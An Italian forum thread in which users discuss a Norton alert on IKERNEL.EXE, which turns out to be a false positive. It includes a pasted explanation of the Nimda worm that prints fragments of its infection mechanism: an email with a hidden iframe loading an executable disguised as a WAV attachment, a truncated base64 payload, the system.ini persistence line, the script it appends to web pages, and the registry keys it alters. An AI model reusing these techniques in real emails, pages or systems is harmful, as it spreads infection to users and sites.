Norton antivirus 2000 ha rilevato un virus (non maligno) nel file IKERNEL.EXE
Non si ripare e quindi l'ho dovuto mettere in quarantena, così non può essere usato dal sistema e non c'è il pericolo che il virus si diffonda ad altri file.

E' un file importante ?
A cosa serve ?

io c'è l'ho nel percorso:

C:\Programmi\File comuni\InstallShield\engine\6\Intel 32

non so cosa possa servire però il 6 come directory mi fa pensare a IE6.....

Ciao

Originariamente inviato da Bilancino
[B]io c'è l'ho nel percorso:

C:\Programmi\File comuni\InstallShield\engine\Intel 32

non so cosa possa servire però il 6 come directory mi fa pensare a IE6.....

Ciao
:eek: :eek: :eek: Il virus è apparso dopo aver installato IE6 dal CD di PCWorld.....vuoi vedere che è proprio quello che contiene il virus!!!!!
Farò uno scan a quel CD

Grazie per l'info :)

Anche io ho installato IE6 da PC-world ma norton 2000 aggiornato non ha trovato niente.......

Ciao

Originariamente inviato da Bilancino
[B]Anche io ho installato IE6 da PC-world ma norton 2000 aggiornato non ha trovato niente.......

Ciao Infatti.....ho fatto lo scanning al CD e Norton nn ha trovato niente.....che file sarà ? :confused:

Ci dai per piacere almeno il nome del virus?

InstallShield è un programma per creare i processi d'installazione...

Originariamente inviato da AlbioB
[B]Ci dai per piacere almeno il nome del virus?

InstallShield è un programma per creare i processi d'installazione...
W32.Nimda.enc(dr)

rimuovilo subito!!!!!!!!!!!!

Originariamente inviato da oasis
[B]rimuovilo subito!!!!!!!!!!!!
:confused: Motivo ?
Non è un file importante ?

Vorrei sostituire il file con quello originale, ma non sò da dove si è installato.

:)

:eek: :eek: :eek:

NIMDA????

Concordo sul fatto che va immediatamente eliminato!!!

NIMDA e’ riuscito in un solo giorno ha balzare in testa alle classifiche mondiali di virus, e secondi i piu' esperti, e' piu' pericoloso di SirCam.

Questo worm, attacca solamente i sistemi operativi Windows NT/9x/ME/2000, sfruttando 3 bachi di Outlook Express (fino alla 5.5), Internet Explorer (fino alla 5.0) e IIS (SP 1).

Esaminiamo caso per caso:
quando il worm attacca Outlook Express (quindi via mail), infetta il sistema, senza che l'allegato sia eseguito! Questo perche' e' sufficiente avere l'anteprima attivata che lui si installa. Per ovviare a questo primo problema, e necessario modificare alcuni parametri di Outlook Express:

=> lanciate il programma, e selezionate il menu "Strumenti", quindi il comando "Opzioni" e selezionate la scheda "Protezione". Selezionate quindi "Area siti con restrizione"

=> selezionate il menu "Visualizza", quindi il comando "Layout" e levate qualora fosse presente il segno di spunta dalla voce "Visualizza riquadro di anteprima"

Eccovi le propieta' del messaggio:

Received: from ...
From: <....>
Subject: ....
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
Message-Id: ...
X-RCPT-TO: ...
Date: ...
X-UIDL: 285007901
Status: U

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4A
tAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW
4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1
TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVOPB
G1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAA
AMpUCAEAAAB/UEUAAEwBBQB1Oqc7
[....]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA=

--====_ABC1234567890DEF_====


Come si può notare la mail segnala ad Outlook la presenza di un file Wav di nome Readme.exe e viene quindi evitata la richiesta di download o apertura del file.

Una volta che il vostro pc e' infetto, viene modificato il file system.ini, a cui viene aggiunta la riga:

Shell=explorer.exe load.exe -dontrunold

Inoltre, in ogni cartella inoltre, vengono creati due possibili file, readme.eml oppure *.nws e/o simili. Vi consiglio comunque di stare attenti ai vari file con estensione .eml e .nws.

Altre traccie possono essere rilevate con i seguenti files:

load.exe
readme.exe
mep*.tmp.exe

Inoltre potrebbe modificare dei files che sono presenti nella root di Windows come:

mmc.exe
riched20.dll

Una volta infettata una macchina, il verme modifica tutti i files *.asp, *.htm, *.html, index.*, main.* e default.* aggiungendo alla fine degli stessi, le righe:

<html><script language="JavaScript">window.open("readme.eml",
null, "resizable=no,top=6000,left=6000")</script></html>

Molti di voi non capiranno questo codice. Questo codice, serve ad aprire una finestrella tra le pagine Web dei siti, contenente il file readme.eml (cioe' quella contenente l'allegato readme.exe che serve per diffondere il virus).

Come se non bastasse, modifica o crea se non sono presenti le seguenti chiavi nell'editor di registro (regedit) per nascondere i files creati:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\Advanced\ShowSuperHidden

Per evitare che il virus si diffonda tramite Internet Explorer, dovete modificare le impostazioni di sicurezza. Per farlo seguite questo percorso: lanciate IE, cliccate sul menu "strumenti", quindi sull'opzione "opzioni internet", selezionate la scheda "Protezione", cliccate sul pulsante "Personalizza livello" e dalla nuova finestrella che si aprira', disabilitate gli ActiveX e il download dei files.

Il virus comunque puo' infettare Pc collegato ad una rete locale, con Windows 9x/ME Nimda imposta la condivisione di tutte le cartelle senza l'utilizzo di alcuna password. Su Windows NT/2000, addirittura permette agli utentu Guest di avere gli stessi diritti degli amministratori!

Attualmente gli unici antivirus in grado di proteggervi da questo virus sono il Norton, il McAfee ed il Pc-Cilin (naturalmente dovete aggiornarli con le ultime firme).

Purtroppo pero', tutti i file infetti (quindi se avete un sito, anche tutte le vostre pagine web con estensione asp e html), vengono messi in quarantena o eliminati. Per fortuna pero' esiste un tool che permette il ripristino di questi file (anche se da quello che so, e' molto difficile da usare). Il tool e' scaricabile da questo indirizzo: http://www.tfm.ro/searchreplace/download/searchreplace.zip .

Esiste anche una patch per gli amministratori di sistema, ed e' scaricabile da questo indirizzo: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-044.asp

Ti consiglio comunque di fare un bel backup dei dati piu' preziosi! Non si sa mai ;)

Per altre informazioni (se queste non ti bastassero) vai sul sito della Symantec: http://securityresponse.symantec.com/avcenter/venc/dyn/24365.html.

Ciao ciao

ALTOLA'!!! :eek:

FERMA TUTTO!!!!!! :eek: :eek: :eek:

Non eliminare quel file!!!!

Vai su http://securityresponse.symantec.com/avcenter/venc/data/false.positive.on.ikernel.exe.html!!!!!

:mad: :mad: accidenti a chi non aggiorna le virus definitions!!!! :mad: :mad:

Originariamente inviato da AlbioB
[B]ALTOLA'!!! :eek:

FERMA TUTTO!!!!!! :eek: :eek: :eek:

Non eliminare quel file!!!!

Vai su http://securityresponse.symantec.com/avcenter/venc/data/false.positive.on.ikernel.exe.html!!!!!

:mad: :mad: accidenti a chi non aggiorna le virus definitions!!!! :mad: :mad:
Grazie di tutto :)
Una volta ogni tanto sbaglia anche la Symantec :D

prego prego

faccio tutto per la patria :D:D:D:D

Originariamente inviato da AlbioB
[B]prego prego

faccio tutto per la patria :D:D:D:D
spero che ti paghino :D :D

Originariamente inviato da omar2
[B]
spero che ti paghino :D :D

certo :o ... mi pagano con gli errori 404 :mad:

Originariamente inviato da AlbioB
[B]

certo :o ... mi pagano con gli errori 404 :mad:
:D :D